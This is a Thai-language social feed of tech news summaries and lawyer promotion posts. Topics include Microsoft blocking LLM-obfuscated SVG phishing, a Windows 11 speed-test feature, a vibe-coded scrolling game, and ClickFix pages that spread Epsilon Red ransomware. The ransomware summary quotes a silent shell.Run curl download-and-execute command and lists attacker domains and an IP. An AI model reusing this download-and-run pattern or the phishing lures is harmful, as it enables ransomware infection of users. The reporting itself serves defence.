อย่างถูกต้องแต่ไม่จำเป็น ➡️ อีเมลถูกส่งจากบัญชีที่ถูกแฮก โดยใช้ BCC เพื่อหลบการตรวจจับ ➡️ Microsoft Defender for Office 365 สกัดการโจมตีได้สำเร็จ ➡️ Security Copilot ใช้ AI วิเคราะห์และระบุว่าโค้ดไม่ใช่สิ่งที่มนุษย์เขียนเอง ➡️ การตรวจจับอาศัยชื่อไฟล์, รูปแบบ SVG, redirect pattern และ session tracking ✅ ข้อมูลเสริมจากภายนอก ➡️ SVG ถูกใช้เป็นช่องทางโจมตีมากขึ้น เพราะสามารถฝัง JavaScript และ HTML ได้ ➡️ LLM เช่น GPT สามารถสร้างโค้ดที่ซับซ้อนและหลบเลี่ยงการตรวจจับได้ ➡️ Security Copilot เป็นระบบ AI ที่ Microsoft พัฒนาเพื่อช่วยวิเคราะห์ภัยคุกคามแบบเรียลไทม์ ➡️ การใช้ CAPTCHA ปลอมเป็นเทคนิคที่ช่วยสร้างความน่าเชื่อถือก่อนหลอกเหยื่อ ➡️ การโจมตีแบบนี้สะท้อนแนวโน้ม “AI vs. AI” ที่ทั้งสองฝ่ายใช้เทคโนโลยีเดียวกัน https://securityonline.info/ai-vs-ai-microsoft-blocks-phishing-attack-using-llm-generated-obfuscated-code/
    SECURITYONLINE.INFO
    AI vs. AI: Microsoft Blocks Phishing Attack Using LLM-Generated Obfuscated Code
    Microsoft blocked a credential phishing campaign that used AI to generate complex, verbose code in an SVG file to obfuscate its payload and evade defenses.
    0 ความคิดเห็น 0 การแบ่งปัน 387 มุมมอง 0 รีวิว
  • ห้ามขายเครื่องดื่มแอลกอฮอล์ให้แก่บุคคลอายุต่ำกว่า 20 ปี
    ------------------------------------------------------------
    ช่องทางการติดตามจันทศิษฐ์ทนายความ
    Instagram : https://www.instagram.com/jantasit_lawyer/...#
    Youtube : https://www.youtube.com/channel/UCYy2exOkFMr_k62i0a_vbCQ
    Tiktok : https://www.tiktok.com/@jantasit_law36?is_from_webapp=1...
    Thaitimes : https://thaitimes.co/pages/jtslawyer
    Blockdit : https://www.blockdit.com/pages/684063179fb20fd9a69d4639
    Line Offcial : https://lin.ee/HfQHAph
    ห้ามขายเครื่องดื่มแอลกอฮอล์ให้แก่บุคคลอายุต่ำกว่า 20 ปี ------------------------------------------------------------ ช่องทางการติดตามจันทศิษฐ์ทนายความ Instagram : https://www.instagram.com/jantasit_lawyer/...# Youtube : https://www.youtube.com/channel/UCYy2exOkFMr_k62i0a_vbCQ Tiktok : https://www.tiktok.com/@jantasit_law36?is_from_webapp=1... Thaitimes : https://thaitimes.co/pages/jtslawyer Blockdit : https://www.blockdit.com/pages/684063179fb20fd9a69d4639 Line Offcial : https://lin.ee/HfQHAph
    0 ความคิดเห็น 0 การแบ่งปัน 487 มุมมอง 0 0 รีวิว
  • “Windows 11 เพิ่มฟีเจอร์ทดสอบความเร็วเน็ตใน Taskbar — กดปุ๊บเปิด Bing ปั๊บ แต่ยังไม่ใช่ระบบในเครื่องจริง”

    Microsoft เตรียมเพิ่มฟีเจอร์ใหม่ใน Windows 11 ที่ให้ผู้ใช้สามารถทดสอบความเร็วอินเทอร์เน็ตได้ทันทีจาก Taskbar โดยไม่ต้องเปิดเว็บไซต์หรือแอปภายนอก โดยในเวอร์ชัน Insider ล่าสุด (Build 26220.6682 และ 26120.6682) มีการเพิ่มปุ่ม “Perform speed test” ทั้งในเมนูคลิกขวาของไอคอนเครือข่าย และในหน้า Quick Settings ของ Wi-Fi

    เมื่อคลิกปุ่มดังกล่าว ระบบจะเปิดเบราว์เซอร์และนำผู้ใช้ไปยัง Bing ซึ่งมีเครื่องมือทดสอบความเร็วเน็ตฝังอยู่ — หมายความว่าฟีเจอร์นี้ยังไม่ใช่การทดสอบแบบ native ภายใน Windows แต่เป็นการเชื่อมต่อไปยังบริการภายนอกที่ Microsoft ควบคุมผ่าน Bing

    นอกจากฟีเจอร์นี้ Microsoft ยังปรับปรุงหน้าการตั้งค่าหลายส่วน เช่น หน้า Mobile Devices ที่รวมการควบคุมโทรศัพท์ไว้ในที่เดียว และหน้า Privacy & Security ที่มีหัวข้อชัดเจนมากขึ้น รวมถึงหน้าใหม่ “Background AI tasks” ที่ยังไม่เสถียรและมีรายงานว่าทำให้ระบบล่มในบางกรณี

    แม้ฟีเจอร์เหล่านี้จะยังอยู่ในเวอร์ชันทดสอบ แต่ก็สะท้อนถึงแนวทางของ Microsoft ที่พยายามเพิ่มความสะดวกในการใช้งาน และเชื่อมโยงบริการของตนเองเข้ากับระบบปฏิบัติการอย่างแนบเนียนมากขึ้น

    ฟีเจอร์ใหม่ใน Windows 11 Insider Build
    เพิ่มปุ่ม “Perform speed test” ในเมนูคลิกขวาของไอคอนเครือข่ายใน Taskbar
    เพิ่มปุ่มทดสอบความเร็วในหน้า Quick Settings ของ Wi-Fi
    เมื่อคลิกแล้วจะเปิด Bing เพื่อทดสอบความเร็วอินเทอร์เน็ตผ่านเบราว์เซอร์
    ฟีเจอร์นี้อยู่ใน Build 26220.6682 และ 26120.6682 (KB5065782) ในช่อง Dev และ Beta

    การปรับปรุงหน้าการตั้งค่า
    หน้า Mobile Devices รวมการควบคุมโทรศัพท์ไว้ในหน้าหลักของ Bluetooth & Devices
    หน้า Privacy & Security ถูกจัดระเบียบใหม่ให้เข้าใจง่ายขึ้น
    เพิ่มหน้า “Background AI tasks” สำหรับควบคุมงานเบื้องหลังของ AI
    การเปลี่ยนแปลงเหล่านี้ยังอยู่ในขั้นตอนการทดสอบกับผู้ใช้ Insider

    https://www.tomshardware.com/software/windows/windows-11-is-getting-a-built-in-internet-speed-test-feature-that-will-take-you-to-bing-along-with-multiple-revamped-settings-pages-latest-insider-channel-builds-reveal-prominent-changes-coming-soon-to-the-os
    📶 “Windows 11 เพิ่มฟีเจอร์ทดสอบความเร็วเน็ตใน Taskbar — กดปุ๊บเปิด Bing ปั๊บ แต่ยังไม่ใช่ระบบในเครื่องจริง” Microsoft เตรียมเพิ่มฟีเจอร์ใหม่ใน Windows 11 ที่ให้ผู้ใช้สามารถทดสอบความเร็วอินเทอร์เน็ตได้ทันทีจาก Taskbar โดยไม่ต้องเปิดเว็บไซต์หรือแอปภายนอก โดยในเวอร์ชัน Insider ล่าสุด (Build 26220.6682 และ 26120.6682) มีการเพิ่มปุ่ม “Perform speed test” ทั้งในเมนูคลิกขวาของไอคอนเครือข่าย และในหน้า Quick Settings ของ Wi-Fi เมื่อคลิกปุ่มดังกล่าว ระบบจะเปิดเบราว์เซอร์และนำผู้ใช้ไปยัง Bing ซึ่งมีเครื่องมือทดสอบความเร็วเน็ตฝังอยู่ — หมายความว่าฟีเจอร์นี้ยังไม่ใช่การทดสอบแบบ native ภายใน Windows แต่เป็นการเชื่อมต่อไปยังบริการภายนอกที่ Microsoft ควบคุมผ่าน Bing นอกจากฟีเจอร์นี้ Microsoft ยังปรับปรุงหน้าการตั้งค่าหลายส่วน เช่น หน้า Mobile Devices ที่รวมการควบคุมโทรศัพท์ไว้ในที่เดียว และหน้า Privacy & Security ที่มีหัวข้อชัดเจนมากขึ้น รวมถึงหน้าใหม่ “Background AI tasks” ที่ยังไม่เสถียรและมีรายงานว่าทำให้ระบบล่มในบางกรณี แม้ฟีเจอร์เหล่านี้จะยังอยู่ในเวอร์ชันทดสอบ แต่ก็สะท้อนถึงแนวทางของ Microsoft ที่พยายามเพิ่มความสะดวกในการใช้งาน และเชื่อมโยงบริการของตนเองเข้ากับระบบปฏิบัติการอย่างแนบเนียนมากขึ้น ✅ ฟีเจอร์ใหม่ใน Windows 11 Insider Build ➡️ เพิ่มปุ่ม “Perform speed test” ในเมนูคลิกขวาของไอคอนเครือข่ายใน Taskbar ➡️ เพิ่มปุ่มทดสอบความเร็วในหน้า Quick Settings ของ Wi-Fi ➡️ เมื่อคลิกแล้วจะเปิด Bing เพื่อทดสอบความเร็วอินเทอร์เน็ตผ่านเบราว์เซอร์ ➡️ ฟีเจอร์นี้อยู่ใน Build 26220.6682 และ 26120.6682 (KB5065782) ในช่อง Dev และ Beta ✅ การปรับปรุงหน้าการตั้งค่า ➡️ หน้า Mobile Devices รวมการควบคุมโทรศัพท์ไว้ในหน้าหลักของ Bluetooth & Devices ➡️ หน้า Privacy & Security ถูกจัดระเบียบใหม่ให้เข้าใจง่ายขึ้น ➡️ เพิ่มหน้า “Background AI tasks” สำหรับควบคุมงานเบื้องหลังของ AI ➡️ การเปลี่ยนแปลงเหล่านี้ยังอยู่ในขั้นตอนการทดสอบกับผู้ใช้ Insider https://www.tomshardware.com/software/windows/windows-11-is-getting-a-built-in-internet-speed-test-feature-that-will-take-you-to-bing-along-with-multiple-revamped-settings-pages-latest-insider-channel-builds-reveal-prominent-changes-coming-soon-to-the-os
    0 ความคิดเห็น 0 การแบ่งปัน 277 มุมมอง 0 รีวิว
  • “Doomscrolling: The Game — เมื่อการเลื่อนหน้าจอกลายเป็นเกมที่ทั้งเสียดสีและเสพติด”

    David Friedman นักเขียนจาก Ironic Sans ได้สร้างเกมที่ไม่เหมือนใครในชื่อว่า “Doomscrolling: The Game” ซึ่งได้รับแรงบันดาลใจจากพฤติกรรมของผู้คนที่เลื่อนฟีดข่าวอย่างไม่หยุดยั้งจนรู้สึกหดหู่ หรือที่เรียกว่า doomscrolling โดยเขาตั้งคำถามว่า “ถ้า Doom เป็นเกมที่เล่นด้วยการเลื่อนหน้าจอเท่านั้น จะเป็นอย่างไร?” และคำตอบก็คือเกมนี้ — ที่คุณไม่ต้องกระโดด ไม่ต้องเคลื่อนที่ด้านข้าง แค่เลื่อนลงไปเรื่อย ๆ

    เกมนี้เริ่มต้นจากความล้มเหลว เพราะ GPT-4 ไม่สามารถเข้าใจแนวคิด “เลื่อนลง = พื้นหลังเลื่อนขึ้น” ได้เลย แต่เมื่อ GPT-5 เปิดตัว Friedman กลับมาลองใหม่ และสามารถสร้างต้นแบบเกมได้ภายใน 2 ชั่วโมง โดยใช้ vibe coding และการทดลองผ่าน “lab pages” ที่ให้เขาปรับค่าต่าง ๆ ด้วยตัวเอง เช่น สีพื้นหลัง, รูปแบบใยแมงมุม, หรือดีไซน์แผ่นป้ายข่าว

    ตัวเกมมีระบบที่กระตุ้นให้ผู้เล่นเคลื่อนไหว เช่น อัปเกรดอาวุธทุก 100 ตัวที่ฆ่า, กำแพงไฟที่ไล่ตามถ้าหยุดนานเกินไป, และสิ่งกีดขวางอย่างใยแมงมุมหรือกำแพงอิฐ นอกจากนี้ยังมี “แผ่นป้ายข่าว” ที่แสดงพาดหัวข่าวจริงจาก RSS ของ New York Times เพื่อสร้างบรรยากาศ doomscrolling อย่างแท้จริง — อ่านแล้วหดหู่แต่ก็อดไม่ได้ที่จะเลื่อนต่อ

    แม้ Friedman จะไม่ใช่นักพัฒนาเกมมืออาชีพ แต่เขาใช้ AI เป็นเครื่องมือในการสร้างเกมที่มีเสน่ห์เฉพาะตัว และเปิดให้เล่นฟรีทั้งบนมือถือและเดสก์ท็อป โดยสามารถบันทึกเกมไว้ในหน้าจอหลักให้เหมือนแอปจริงได้

    จุดเด่นของ Doomscrolling: The Game
    เล่นด้วยการเลื่อนหน้าจอเท่านั้น — ไม่มีการเคลื่อนที่ด้านข้างหรือกระโดด
    ได้แรงบันดาลใจจากเกม Doom และพฤติกรรม doomscrolling
    ใช้ GPT-5 ในการสร้างต้นแบบเกมภายในเวลาอันสั้น
    ใช้ vibe coding และ lab pages เพื่อปรับแต่งองค์ประกอบเกม

    ระบบเกมที่กระตุ้นให้เคลื่อนไหว
    อัปเกรดอาวุธทุก 100 ตัวที่ฆ่า
    กำแพงไฟไล่ตามถ้าหยุดนานเกินไป
    มีสิ่งกีดขวาง เช่น ใยแมงมุมและกำแพงอิฐ
    มี health potion และระบบบันทึกระยะทางที่ทำได้

    การผสานข่าวจริงเข้ากับเกม
    ใช้ RSS feed จาก New York Times แสดงพาดหัวข่าวบนแผ่นป้าย
    ข่าวไม่มีผลต่อเกม แต่สร้างบรรยากาศ doomscrolling อย่างแท้จริง
    ผู้เล่นอาจถูกดึงดูดให้หยุดอ่านข่าวระหว่างเล่น
    เป็นการเสียดสีพฤติกรรมเสพข่าวที่ไม่มีวันจบ

    ข้อมูลเสริมจากภายนอก
    เกมนี้เป็นตัวอย่างของ “vibe-coded” project ที่ใช้ AI อย่างสร้างสรรค์
    Friedman ใช้ lab pages เพื่อปรับค่ากราฟิก เช่น ใยแมงมุมและแผ่นป้าย
    เกมสามารถเล่นได้ทั้งบนมือถือและเดสก์ท็อปอย่างลื่นไหล
    มีผู้เล่นบางรายรายงานปัญหาเรื่องการเลื่อนหน้าจอบนบางเบราว์เซอร์

    https://ironicsans.ghost.io/doomscrolling-the-game/
    🕹️ “Doomscrolling: The Game — เมื่อการเลื่อนหน้าจอกลายเป็นเกมที่ทั้งเสียดสีและเสพติด” David Friedman นักเขียนจาก Ironic Sans ได้สร้างเกมที่ไม่เหมือนใครในชื่อว่า “Doomscrolling: The Game” ซึ่งได้รับแรงบันดาลใจจากพฤติกรรมของผู้คนที่เลื่อนฟีดข่าวอย่างไม่หยุดยั้งจนรู้สึกหดหู่ หรือที่เรียกว่า doomscrolling โดยเขาตั้งคำถามว่า “ถ้า Doom เป็นเกมที่เล่นด้วยการเลื่อนหน้าจอเท่านั้น จะเป็นอย่างไร?” และคำตอบก็คือเกมนี้ — ที่คุณไม่ต้องกระโดด ไม่ต้องเคลื่อนที่ด้านข้าง แค่เลื่อนลงไปเรื่อย ๆ เกมนี้เริ่มต้นจากความล้มเหลว เพราะ GPT-4 ไม่สามารถเข้าใจแนวคิด “เลื่อนลง = พื้นหลังเลื่อนขึ้น” ได้เลย แต่เมื่อ GPT-5 เปิดตัว Friedman กลับมาลองใหม่ และสามารถสร้างต้นแบบเกมได้ภายใน 2 ชั่วโมง โดยใช้ vibe coding และการทดลองผ่าน “lab pages” ที่ให้เขาปรับค่าต่าง ๆ ด้วยตัวเอง เช่น สีพื้นหลัง, รูปแบบใยแมงมุม, หรือดีไซน์แผ่นป้ายข่าว ตัวเกมมีระบบที่กระตุ้นให้ผู้เล่นเคลื่อนไหว เช่น อัปเกรดอาวุธทุก 100 ตัวที่ฆ่า, กำแพงไฟที่ไล่ตามถ้าหยุดนานเกินไป, และสิ่งกีดขวางอย่างใยแมงมุมหรือกำแพงอิฐ นอกจากนี้ยังมี “แผ่นป้ายข่าว” ที่แสดงพาดหัวข่าวจริงจาก RSS ของ New York Times เพื่อสร้างบรรยากาศ doomscrolling อย่างแท้จริง — อ่านแล้วหดหู่แต่ก็อดไม่ได้ที่จะเลื่อนต่อ แม้ Friedman จะไม่ใช่นักพัฒนาเกมมืออาชีพ แต่เขาใช้ AI เป็นเครื่องมือในการสร้างเกมที่มีเสน่ห์เฉพาะตัว และเปิดให้เล่นฟรีทั้งบนมือถือและเดสก์ท็อป โดยสามารถบันทึกเกมไว้ในหน้าจอหลักให้เหมือนแอปจริงได้ ✅ จุดเด่นของ Doomscrolling: The Game ➡️ เล่นด้วยการเลื่อนหน้าจอเท่านั้น — ไม่มีการเคลื่อนที่ด้านข้างหรือกระโดด ➡️ ได้แรงบันดาลใจจากเกม Doom และพฤติกรรม doomscrolling ➡️ ใช้ GPT-5 ในการสร้างต้นแบบเกมภายในเวลาอันสั้น ➡️ ใช้ vibe coding และ lab pages เพื่อปรับแต่งองค์ประกอบเกม ✅ ระบบเกมที่กระตุ้นให้เคลื่อนไหว ➡️ อัปเกรดอาวุธทุก 100 ตัวที่ฆ่า ➡️ กำแพงไฟไล่ตามถ้าหยุดนานเกินไป ➡️ มีสิ่งกีดขวาง เช่น ใยแมงมุมและกำแพงอิฐ ➡️ มี health potion และระบบบันทึกระยะทางที่ทำได้ ✅ การผสานข่าวจริงเข้ากับเกม ➡️ ใช้ RSS feed จาก New York Times แสดงพาดหัวข่าวบนแผ่นป้าย ➡️ ข่าวไม่มีผลต่อเกม แต่สร้างบรรยากาศ doomscrolling อย่างแท้จริง ➡️ ผู้เล่นอาจถูกดึงดูดให้หยุดอ่านข่าวระหว่างเล่น ➡️ เป็นการเสียดสีพฤติกรรมเสพข่าวที่ไม่มีวันจบ ✅ ข้อมูลเสริมจากภายนอก ➡️ เกมนี้เป็นตัวอย่างของ “vibe-coded” project ที่ใช้ AI อย่างสร้างสรรค์ ➡️ Friedman ใช้ lab pages เพื่อปรับค่ากราฟิก เช่น ใยแมงมุมและแผ่นป้าย ➡️ เกมสามารถเล่นได้ทั้งบนมือถือและเดสก์ท็อปอย่างลื่นไหล ➡️ มีผู้เล่นบางรายรายงานปัญหาเรื่องการเลื่อนหน้าจอบนบางเบราว์เซอร์ https://ironicsans.ghost.io/doomscrolling-the-game/
    IRONICSANS.GHOST.IO
    Doomscrolling: The Game
    Can a game work where all you do is scroll?
    0 ความคิดเห็น 0 การแบ่งปัน 377 มุมมอง 0 รีวิว
  • ความผิดฐานชิงทรัพย์ ตามมาตรา 339
    #กฎหมาย #ทนายความ
    --------------------------------------------------------------------
    ช่องทางการติดตามจันทศิษฐ์ทนายความ
    Instagram : https://www.instagram.com/jantasit_lawyer/...#
    Youtube : https://www.youtube.com/channel/UCYy2exOkFMr_k62i0a_vbCQ
    Tiktok : https://www.tiktok.com/@jantasit_law36?is_from_webapp=1...
    Thaitimes : https://thaitimes.co/pages/jtslawyer
    Blockdit : https://www.blockdit.com/pages/684063179fb20fd9a69d4639
    Line Offcial : https://lin.ee/HfQHAph
    ความผิดฐานชิงทรัพย์ ตามมาตรา 339 #กฎหมาย #ทนายความ -------------------------------------------------------------------- ช่องทางการติดตามจันทศิษฐ์ทนายความ Instagram : https://www.instagram.com/jantasit_lawyer/...# Youtube : https://www.youtube.com/channel/UCYy2exOkFMr_k62i0a_vbCQ Tiktok : https://www.tiktok.com/@jantasit_law36?is_from_webapp=1... Thaitimes : https://thaitimes.co/pages/jtslawyer Blockdit : https://www.blockdit.com/pages/684063179fb20fd9a69d4639 Line Offcial : https://lin.ee/HfQHAph
    0 ความคิดเห็น 0 การแบ่งปัน 469 มุมมอง 0 0 รีวิว
  • EP.79 : ความผิดฐานชิงทรัพย์ ตามมาตรา 339
    --------------------------------------------------------------------
    ช่องทางการติดตามจันทศิษฐ์ทนายความ
    Instagram : https://www.instagram.com/jantasit_lawyer/...#
    Youtube : https://www.youtube.com/channel/UCYy2exOkFMr_k62i0a_vbCQ
    Tiktok : https://www.tiktok.com/@jantasit_law36?is_from_webapp=1...
    Thaitimes : https://thaitimes.co/pages/jtslawyer
    Blockdit : https://www.blockdit.com/pages/684063179fb20fd9a69d4639
    Line Offcial : https://lin.ee/HfQHAph
    EP.79 : ความผิดฐานชิงทรัพย์ ตามมาตรา 339 -------------------------------------------------------------------- ช่องทางการติดตามจันทศิษฐ์ทนายความ Instagram : https://www.instagram.com/jantasit_lawyer/...# Youtube : https://www.youtube.com/channel/UCYy2exOkFMr_k62i0a_vbCQ Tiktok : https://www.tiktok.com/@jantasit_law36?is_from_webapp=1... Thaitimes : https://thaitimes.co/pages/jtslawyer Blockdit : https://www.blockdit.com/pages/684063179fb20fd9a69d4639 Line Offcial : https://lin.ee/HfQHAph
    0 ความคิดเห็น 0 การแบ่งปัน 437 มุมมอง 0 รีวิว
  • เรื่องเล่าจากข่าว: “ClickFix” กับกับดักปลอมที่เปิดทางให้ Epsilon Red เข้าระบบคุณ

    ตั้งแต่เดือนกรกฎาคม 2025 แฮกเกอร์เริ่มใช้หน้าเว็บปลอมที่ดูเหมือนระบบยืนยันตัวตนจากแพลตฟอร์มดัง เช่น Discord, Twitch, Kick และ OnlyFans โดยอ้างว่าเป็น “ClickFix verification” เพื่อหลอกให้ผู้ใช้ดาวน์โหลดไฟล์ .HTA ซึ่งเป็นไฟล์ HTML ที่สามารถรันสคริปต์ได้ใน Windows

    เมื่อผู้ใช้คลิก “ยืนยันตัวตน” หน้าเว็บจะเปิดอีกหน้าที่แอบรันคำสั่งผ่าน ActiveXObject เช่น WScript.Shell เพื่อดาวน์โหลดไฟล์ ransomware จากเซิร์ฟเวอร์ของแฮกเกอร์ แล้วรันแบบเงียบ ๆ โดยไม่แสดงหน้าต่างใด ๆ

    เทคนิคนี้ต่างจากเวอร์ชันเก่าที่ใช้การคัดลอกคำสั่งไปยัง clipboard—เพราะเวอร์ชันใหม่นี้รันคำสั่งโดยตรงผ่านเบราว์เซอร์ ทำให้หลบเลี่ยงระบบป้องกันได้ง่ายขึ้น

    Epsilon Red ransomware จะเข้ารหัสไฟล์ทั้งหมดในเครื่อง และทิ้งข้อความเรียกค่าไถ่ที่มีสไตล์คล้าย REvil แต่มีการปรับปรุงด้านไวยากรณ์เล็กน้อย

    Epsilon Red ransomware ถูกแพร่ผ่านไฟล์ .HTA ที่แฝงอยู่ในหน้าเว็บปลอมชื่อ “ClickFix”
    หน้าเว็บปลอมอ้างว่าเป็นระบบยืนยันตัวตนจาก Discord, Twitch, Kick, OnlyFans
    หลอกให้ผู้ใช้คลิกและรันไฟล์ .HTA ที่มีสคริปต์อันตราย

    ไฟล์ .HTA ใช้ ActiveXObject เพื่อรันคำสั่งผ่าน Windows Script Host (WSH)
    เช่น shell.Run("cmd /c curl -s -o a.exe ... && a.exe", 0)
    ดาวน์โหลดไฟล์ ransomware และรันแบบเงียบโดยไม่เปิดหน้าต่าง

    แฮกเกอร์ใช้เทคนิค social engineering เช่นข้อความยืนยันปลอมเพื่อหลอกผู้ใช้
    เช่น “Your Verificatification Code Is: PC-19fj5e9i-cje8i3e4” พร้อม typo จงใจให้ดูไม่อันตราย
    ใช้คำสั่ง pause เพื่อให้หน้าต่างค้างไว้ดูเหมือนระบบจริง

    Epsilon Red ransomware เข้ารหัสไฟล์ทั้งหมดในเครื่องและทิ้งข้อความเรียกค่าไถ่
    มีลักษณะคล้าย REvil แต่ไม่มีความเกี่ยวข้องโดยตรง
    ใช้ PowerShell scripts หลายตัวเพื่อเตรียมระบบก่อนเข้ารหัส

    โครงสร้างแคมเปญมีการปลอมตัวเป็นบริการยอดนิยมและใช้ IP/โดเมนเฉพาะในการโจมตี
    เช่น twtich[.]cc, capchabot[.]cc และ IP 155.94.155.227:2269
    มีการใช้ Quasar RAT ร่วมด้วยในบางกรณี

    ผู้ใช้ที่เปิดไฟล์ .HTA หรือใช้ Internet Explorer มีความเสี่ยงสูงมาก
    ActiveX ยังเปิดใช้งานในบางระบบ Windows โดยไม่รู้ตัว
    การรันคำสั่งผ่านเบราว์เซอร์สามารถหลบเลี่ยง SmartScreen และระบบป้องกันทั่วไป

    องค์กรที่อนุญาตให้ใช้ปลั๊กอินเบราว์เซอร์หรือไม่จำกัดการเข้าถึงเว็บมีความเสี่ยงสูง
    ผู้ใช้สามารถเข้าถึงหน้า ClickFix ปลอมและรันไฟล์ได้โดยไม่รู้ตัว
    Endpoint อาจถูกเข้ารหัสและเรียกค่าไถ่ทันที

    การใช้ social engineering แบบปลอมตัวเป็นบริการยอดนิยมทำให้ผู้ใช้ตกหลุมพรางง่ายขึ้น
    ผู้ใช้เชื่อว่าเป็นการยืนยันตัวตนจริงจาก Discord หรือ Twitch
    ไม่สงสัยว่าเป็นการโจมตีเพราะหน้าตาเว็บดูน่าเชื่อถือ

    ระบบป้องกันแบบเดิมไม่สามารถตรวจจับการรันคำสั่งผ่าน ActiveX ได้ทันเวลา
    การรันแบบเงียบไม่แสดงหน้าต่างหรือแจ้งเตือน
    ไฟล์ถูกดาวน์โหลดและรันในหน่วยความจำโดยไม่มีร่องรอย

    https://hackread.com/onlyfans-discord-clickfix-pages-epsilon-red-ransomware/
    🧠 เรื่องเล่าจากข่าว: “ClickFix” กับกับดักปลอมที่เปิดทางให้ Epsilon Red เข้าระบบคุณ ตั้งแต่เดือนกรกฎาคม 2025 แฮกเกอร์เริ่มใช้หน้าเว็บปลอมที่ดูเหมือนระบบยืนยันตัวตนจากแพลตฟอร์มดัง เช่น Discord, Twitch, Kick และ OnlyFans โดยอ้างว่าเป็น “ClickFix verification” เพื่อหลอกให้ผู้ใช้ดาวน์โหลดไฟล์ .HTA ซึ่งเป็นไฟล์ HTML ที่สามารถรันสคริปต์ได้ใน Windows เมื่อผู้ใช้คลิก “ยืนยันตัวตน” หน้าเว็บจะเปิดอีกหน้าที่แอบรันคำสั่งผ่าน ActiveXObject เช่น WScript.Shell เพื่อดาวน์โหลดไฟล์ ransomware จากเซิร์ฟเวอร์ของแฮกเกอร์ แล้วรันแบบเงียบ ๆ โดยไม่แสดงหน้าต่างใด ๆ เทคนิคนี้ต่างจากเวอร์ชันเก่าที่ใช้การคัดลอกคำสั่งไปยัง clipboard—เพราะเวอร์ชันใหม่นี้รันคำสั่งโดยตรงผ่านเบราว์เซอร์ ทำให้หลบเลี่ยงระบบป้องกันได้ง่ายขึ้น Epsilon Red ransomware จะเข้ารหัสไฟล์ทั้งหมดในเครื่อง และทิ้งข้อความเรียกค่าไถ่ที่มีสไตล์คล้าย REvil แต่มีการปรับปรุงด้านไวยากรณ์เล็กน้อย ✅ Epsilon Red ransomware ถูกแพร่ผ่านไฟล์ .HTA ที่แฝงอยู่ในหน้าเว็บปลอมชื่อ “ClickFix” ➡️ หน้าเว็บปลอมอ้างว่าเป็นระบบยืนยันตัวตนจาก Discord, Twitch, Kick, OnlyFans ➡️ หลอกให้ผู้ใช้คลิกและรันไฟล์ .HTA ที่มีสคริปต์อันตราย ✅ ไฟล์ .HTA ใช้ ActiveXObject เพื่อรันคำสั่งผ่าน Windows Script Host (WSH) ➡️ เช่น shell.Run("cmd /c curl -s -o a.exe ... && a.exe", 0) ➡️ ดาวน์โหลดไฟล์ ransomware และรันแบบเงียบโดยไม่เปิดหน้าต่าง ✅ แฮกเกอร์ใช้เทคนิค social engineering เช่นข้อความยืนยันปลอมเพื่อหลอกผู้ใช้ ➡️ เช่น “Your Verificatification Code Is: PC-19fj5e9i-cje8i3e4” พร้อม typo จงใจให้ดูไม่อันตราย ➡️ ใช้คำสั่ง pause เพื่อให้หน้าต่างค้างไว้ดูเหมือนระบบจริง ✅ Epsilon Red ransomware เข้ารหัสไฟล์ทั้งหมดในเครื่องและทิ้งข้อความเรียกค่าไถ่ ➡️ มีลักษณะคล้าย REvil แต่ไม่มีความเกี่ยวข้องโดยตรง ➡️ ใช้ PowerShell scripts หลายตัวเพื่อเตรียมระบบก่อนเข้ารหัส ✅ โครงสร้างแคมเปญมีการปลอมตัวเป็นบริการยอดนิยมและใช้ IP/โดเมนเฉพาะในการโจมตี ➡️ เช่น twtich[.]cc, capchabot[.]cc และ IP 155.94.155.227:2269 ➡️ มีการใช้ Quasar RAT ร่วมด้วยในบางกรณี ‼️ ผู้ใช้ที่เปิดไฟล์ .HTA หรือใช้ Internet Explorer มีความเสี่ยงสูงมาก ⛔ ActiveX ยังเปิดใช้งานในบางระบบ Windows โดยไม่รู้ตัว ⛔ การรันคำสั่งผ่านเบราว์เซอร์สามารถหลบเลี่ยง SmartScreen และระบบป้องกันทั่วไป ‼️ องค์กรที่อนุญาตให้ใช้ปลั๊กอินเบราว์เซอร์หรือไม่จำกัดการเข้าถึงเว็บมีความเสี่ยงสูง ⛔ ผู้ใช้สามารถเข้าถึงหน้า ClickFix ปลอมและรันไฟล์ได้โดยไม่รู้ตัว ⛔ Endpoint อาจถูกเข้ารหัสและเรียกค่าไถ่ทันที ‼️ การใช้ social engineering แบบปลอมตัวเป็นบริการยอดนิยมทำให้ผู้ใช้ตกหลุมพรางง่ายขึ้น ⛔ ผู้ใช้เชื่อว่าเป็นการยืนยันตัวตนจริงจาก Discord หรือ Twitch ⛔ ไม่สงสัยว่าเป็นการโจมตีเพราะหน้าตาเว็บดูน่าเชื่อถือ ‼️ ระบบป้องกันแบบเดิมไม่สามารถตรวจจับการรันคำสั่งผ่าน ActiveX ได้ทันเวลา ⛔ การรันแบบเงียบไม่แสดงหน้าต่างหรือแจ้งเตือน ⛔ ไฟล์ถูกดาวน์โหลดและรันในหน่วยความจำโดยไม่มีร่องรอย https://hackread.com/onlyfans-discord-clickfix-pages-epsilon-red-ransomware/
    HACKREAD.COM
    OnlyFans, Discord ClickFix-Themed Pages Spread Epsilon Red Ransomware
    Follow us on Bluesky, Twitter (X), Mastodon and Facebook at @Hackread
    0 ความคิดเห็น 0 การแบ่งปัน 462 มุมมอง 0 รีวิว
  • แสวงหาเรื่องราวทั้งไทยและอาเซียน ที่ชัดเจน ตรงไปตรงมา บนพื้นฐานของความจริง

    พบกับ Newskit ทุกเช้าวันจันทร์-พฤหัสบดี เริ่ม 4 สิงหาคม 2568 (ยกเว้นวันหยุดนักขัตฤกษ์ หรือมีธุระส่วนตัว)

    อ่านโพสต์ใหม่ได้ที่

    Thaitimes : https://thaitimes.co/pages/newskit
    Facebook : https://facebook.com/newskit.th
    Instagram : https://instagram.com/newskit.th

    #Newskit LIFE NEVER STOPS.
    แสวงหาเรื่องราวทั้งไทยและอาเซียน ที่ชัดเจน ตรงไปตรงมา บนพื้นฐานของความจริง พบกับ Newskit ทุกเช้าวันจันทร์-พฤหัสบดี เริ่ม 4 สิงหาคม 2568 (ยกเว้นวันหยุดนักขัตฤกษ์ หรือมีธุระส่วนตัว) อ่านโพสต์ใหม่ได้ที่ Thaitimes : https://thaitimes.co/pages/newskit Facebook : https://facebook.com/newskit.th Instagram : https://instagram.com/newskit.th #Newskit LIFE NEVER STOPS.
    Like
    1
    0 ความคิดเห็น 0 การแบ่งปัน 450 มุมมอง 0 รีวิว
  • EP.56 : โฉนดที่ดิน
    #กฎหมาย #ทนายความ
    ---------------------------------------------
    ติดตามความรู้ทางกฎหมายจากพวกเราได้ที่
    Facebook : https://www.facebook.com/profile.php?id=61567000193856
    Instagram : https://www.instagram.com/jantasit_lawyer/...#
